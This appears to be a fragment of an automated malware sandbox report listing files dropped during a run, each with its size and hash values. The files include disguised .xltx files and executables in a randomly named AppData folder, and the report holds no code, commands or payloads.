  SHA256: da7df464d0b2384703521f69305abeceaf2a27226ec5f2e4a1cfa60cf9522b0c
  SHA512: ea9c413de40322e43e84c4827be693cf2e4f06afef2ff1c1ece7242323dfc799bc688afbd204cc73dfaab03767fc17c3cf6f5da412e33eeb511b9a4b8717013b
- (path not shown)
  Filesize: 70KB
  MD5: 49aebf8cbd62d92ac215b2923fb1b9f5
  SHA1: 1723be06719828dda65ad804298d0431f6aff976
  SHA256: b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
  SHA512: bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b
- (path not shown)
  Filesize: 181KB
  MD5: 4ea6026cf93ec6338144661bf1202cd1
  SHA1: a1dec9044f750ad887935a01430bf49322fbdcb7
  SHA256: 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
  SHA512: 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b
- (path not shown)
  Filesize: 2KB
  MD5: e526da1842354849cfc018128001a6b4
  SHA1: 921f1ab5499eb550a351d4a394bd44df5d173ea5
  SHA256: 563dd781dd63543f7ee67747f044fbd77877cd46e34df7de1c96f287eeb39b14
  SHA512: 79b4f306f9d89af12441fb6df2221a0ff8b9124ff23fadca037ed2319eb6a989bc94595598c49b61ed2e8dc12015b68190e59b7658eeaf1825d8d37de2586865
- (path not shown)
  Filesize: 9KB
  MD5: fdc134c640049724853a14b692623719
  SHA1: 500ff9c4e30c34e4ab0ac0ce7c32e5f9116020a5
  SHA256: dc42333f20b3a524dc7d7a1c3301188d36642fb077758c2ab4d824a0439ecd00
  SHA512: 1b34d84d77cad63d69fcae45735c3616ff6bcac2176bfef1ce4e6d08f4bffa98a48aaa036b3f9674d516d923a353bc339290f7204436de9971e7b2ebf60f407f
- (path not shown)
  Filesize: 2KB
  MD5: d427d2ed9db86d08b38f5f8b5eec4493
  SHA1: 5cfe9f751bad99009abf1a642eec8f7c67870051
  SHA256: 7d0cb57ba7d2af6ff75a9c203d1338ce31199d07eeca391e9a82fedcbe068512
  SHA512: fc381ec4b2dcdfd10d55d5d317e7a6011da9a859a7e98a84d49391637aa22eaf983875c9bf5bad8403b006566d4053d8f8946d3cbd52a433eac60c26f73cf659
- (path not shown)
  Filesize: 2KB
  MD5: 193242114c1738d0ea04aa93659fdd5a
  SHA1: a929cc1cfbe44ba8a99117dfd7819776ab45d465
  SHA256: c879379224bc8dc4a4f495f989711714a936892b11e7a1cf6e7b79654dc8f928
  SHA512: 46825c3cc42c3c2e86a3890b29b3a2cf9b30e892d0d38bfb2e3334ffa3951b8f732b2786bdffa528ee6ff05c789c35e963f069d54680c3e16735165072e6fec4
- (path not shown)
  Filesize: 1KB
  MD5: 6d19b2702b77a20b89818484cbc83506
  SHA1: f42dbd3ab3c60ea9952e2a0f66826e153f89d943
  SHA256: 042ef6e3349edef436e425a5ec5d7c23f49a93f2866ae31c10ada08e9e012d5f
  SHA512: 184e47c8aaa2e8a391e08ba2c5932c6a16b620303c4c985df9e149770a866e8e3948a027150070044cdb56adfb11ad8b8cbd5979e78a0fbf444868cab9b4a285
- (path not shown)
  Filesize: 1KB
  MD5: 705e82f324c49aae504bd529ec0f3330
  SHA1: 8fb0f70c93a7edb66de83142ed7abfafbc60bf81
  SHA256: 31be73b1a36ba59416178bca73530ae0f9f1d7925d3f99ccba453c8dde1c21c9
  SHA512: ba45515a03c626ace1c67503e0d0990cd740767d857ecd9c8e0c7d651c84e4371549b00094bdf54168fbe4e47578fe3d7aa618be457fee1b8109b6dee2309c2a
- (path not shown)
  Filesize: 942B
  MD5: 4c5d0b302107e9ab3bf5d8c8144df394
  SHA1: e9f2208cf3b2385e49cccd0f766bb249c1f2e5bb
  SHA256: e2e7bd0d6c4fb8e0003570753f971e7d9676bf5edd409285ca612f2c9ab68730
  SHA512: e695c44ada405fbdf122bfc73cedfb1589fa63c82f6ffcde55bffad67200d27d5a8739469986bafa5857fc53154510140bac3642c83421965754015996db12a4
- (path not shown)
  Filesize: 837B
  MD5: e183f207373558455ab227584a4380a8
  SHA1: cd6289ccde5ba4af4accd1f7f2e2837fa34a75cb
  SHA256: be4a8c5c39c701c74e37e5f2f5669867e888d4fa8027986624142c12a9748a83
  SHA512: 8837a3ba2634c5f658d3a319581b596681d6b214f2a81ce87f06bf524ed379ebaf79e0242b5bb37b117cf207f75efe47376851d8ddfd0e23aafad8f5f575ac90
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
  Filesize: 7KB
  MD5: 3f66ec9fc93b0ad2a98da513dc00fddb
  SHA1: 40a3e322b16fca6a17d76445f3295bd70b926daa
  SHA256: ad4c230a69993f4bcb8ac00f43087b74ce87010b52ff74db6ed4707cd266d73b
  SHA512: bff5fff78a3f557752c87fd888f611e4b80755d00ebb46f4b9cd9a491ffc2377d250e493e28c3a613af9ca75b341d3dd368e22a4801701ee2988a30498ef66ca
- C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\Abbassando.xltx
  Filesize: 1.0MB
  MD5: e8b84f9aae8f56157bab0cb0ca34fe45
  SHA1: 08f3fae0a026c59d42d698eeceb2cde4cb5cc83e
  SHA256: 276c2faaae669568b7655862d1aa85c7b711df06a4bea1cce5f6f5578d9d440e
  SHA512: 03d80a1a53daa470f6a684f84609b3f744e524300fb6f7e693f0d102bd77ac1d140da200cb4b3df86e0477826bbd7eaba10a8e10d68b6ce378b55384cb18430a
- C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\Attesa.xltx
  Filesize: 1.1MB
  MD5: 1cbc6a4ec6699390f807eaca769b9e9e
  SHA1: 265b0640a35ce9a161ec4c0cad5142d5cf7e9feb
  SHA256: 747cfe4985ce5203e973f9be6ac7e43c6980babcb7203f1c989469670feec350
  SHA512: 19fcba9aa6fa052c7ef032f694313b153835a78bbc7072b54f41f3ef9c8985a70b67c7de968312793c2a644d55411f0a058aab955945322069191b746ca44b47
- C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\Esistenza.xltx
  Filesize: 1.0MB
  MD5: 6c1b9b74d09b572db467629a0e4d3eec
  SHA1: a38508ddc0d932690f416532ddbd32ee4375b164
  SHA256: 70b96681d633c392bd6b2782128ee018bbe2eedb1ab565784db6016f1401f609
  SHA512: 3515105e577255827e26b28bbcd79219bf5598809d526481b34dcb645bb54827d7680b2ee9cb82036cfefbc636211b66f73efc63a9a99e09cbb45ffbf5230b5c
- C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\Facilita.xltx
  Filesize: 1.9MB
  MD5: f07ba54d61e8ecd234cfc29dbd63c082
  SHA1: 2959ab5302060059db4c12af0ff9aa5c8d060499
  SHA256: 17b8e05da75af68ae79999fb70d3031cbfc92ffaa6862e8b6bb6f9cee11a100a
  SHA512: b4ab41d0c0d26b79418a96a926217540e6c784fa87f6625416c39280245773ddf3c84c671fc5e1a9a79a628b12b79c09f34e4ca50fdded172b1add790c3f5864
- C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\Mio.xltx
  Filesize: 921KB
  MD5: a2a838e2b4d650fc8f8f59408183684a
  SHA1: 90c5b4ed3cb75b7ce6d3fb201d53bcb83fc812a1
  SHA256: ad7dc09b1a02ac60bc7fca76a294dfa5499af0ba7a840ff845c042cbac875e57
  SHA512: 226dd3f5697759bed3926483966b0e71287526dd2308a460239e6cc215dce20a4bb06505969c30efbea5000c135bc2c3eb5b6b1bdb6a17b6cb748e9783336027
- C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\Rimasta.xltx
  Filesize: 138KB
  MD5: 6dfb1c72ba137b2aa256907636a86427
  SHA1: df8349a7e235ab63920ede1ba662628e2ec3b9e1
  SHA256: bd439ef1861dbad75461d95f2ced0e3a6ae9fd776b51fab9f5717444fd89d3ab
  SHA512: 7298f2db3485a48de49645e7deeb1f413e16d3f4f01c96ddc1599be65465d66918c36b7f95db167b67bc03b2b60564dc9437da6aa798ac2a9842d88bfe4b01db
- C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\Solitario.xltx
  Filesize: 389KB
  MD5: d3394e00792e6cddadf23ad7e89629f6
  SHA1: e36e73c357ff01cb184fa477c0f2957a21bbac00
  SHA256: 71d98c2ccab23a0bf3701d9e3758d40b152309f96d97d83388663f2985a67e04
  SHA512: ebd7107dddfa14eb73d3f36e124dd253ad4a7fe11a2b425205ad08a236061e614536622924a5b28bdf5212c10202d0b8b6f4d0040e9a6fba3391d0a1f244707b
- C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\Viso.xltx
  Filesize: 88KB
  MD5: 8fb8bc2a52e6514fcd7c481e3d2c5a19
  SHA1: b214c89d3960f7c67fe76a55839e6da7342c6b20
  SHA256: f7dc64367911ef5e81f3bfb586bb0ffa24e2d2fb19f845b2c1fba6c84ca6006e
  SHA512: 4cc02e9a48decb29c927bc2bcc800576370db96573757e1164e6133641641d5edd10f7be01cf7cf7ee6840cfe445e9ab6debfdea60b623950abb2f8a1373fb37
- (path not shown)
  Filesize: 64KB
  MD5: fed49d376f98afa1119bcafada188074
  SHA1: fbe3f32e2024fa898d87afabb913695e1dd32457
  SHA256: a060a2667517ffa704a09dbc5c3a6ec34e4aff97063b93f168b72997c952c38e
  SHA512: 46823890508d65ec19face21e796d80954a36d739d067685239ebb095fd0ddee946e96784cf2a266bf28448cd329f3e754876b899980230c6762f130e7b26b4d
- (path not shown)
  Filesize: 1.4MB
  MD5: 3288c284561055044c489567fd630ac2
  SHA1: 11ffeabbe42159e1365aa82463d8690c845ce7b7
  SHA256: ac92d4c6397eb4451095949ac485ef4ec38501d7bb6f475419529ae67e297753
  SHA512: c25b28a340a23a9fa932aa95075f85fdd61880f29ef96f5179097b652f69434e0f1f8825e2648b2a0de1f4b0f9b8373080a22117974fcdf44112906d330fca02
- (path not shown)
  Filesize: 114KB
  MD5: 461ade40b800ae80a40985594e1ac236
  SHA1: b3892eef846c044a2b0785d54a432b3e93a968c8
  SHA256: 798af20db39280f90a1d35f2ac2c1d62124d1f5218a2a0fa29d87a13340bd3e4
  SHA512: 421f9060c4b61fa6f4074508602a2639209032fd5df5bfc702a159e3bad5479684ccb3f6e02f3e38fb8db53839cf3f41fe58a3acad6ec1199a48dc333b2d8a26
- \Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\Potere.exe.com
  Filesize: 921KB
  MD5: 78ba0653a340bac5ff152b21a83626cc
  SHA1: b12da9cb5d024555405040e65ad89d16ae749502
  SHA256: 05d8cf394190f3a707abfb25fb44d7da9d5f533d7d2063b23c00cc11253c8be7
  SHA512: efb75e4c1e0057ffb47613fd5aae8ce3912b1558a4b74dbf5284c942eac78ecd9aca98f7c1e0e96ec38e8177e58ffdf54f2eb0385e73eef39e8a2ce611237317
- \Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\RegAsm.exe
  Filesize: 63KB
  MD5: b58b926c3574d28d5b7fdd2ca3ec30d5
  SHA1: d260c4ffd603a9cfc057fcb83d678b1cecdf86f9
  SHA256: 6e70b56d748c4ccab13cc8a055d3795ea0dd95fe3b70568d7d3ac0c6621140a3
  SHA512: b13cb998822b716b695013bcd6dec62a2290567d0d1743b2d982ca084235cf69c6ea1fc91c9d4e62657c6f9e102c7c60e81296ab055ffe43b887c5f8ec8958ab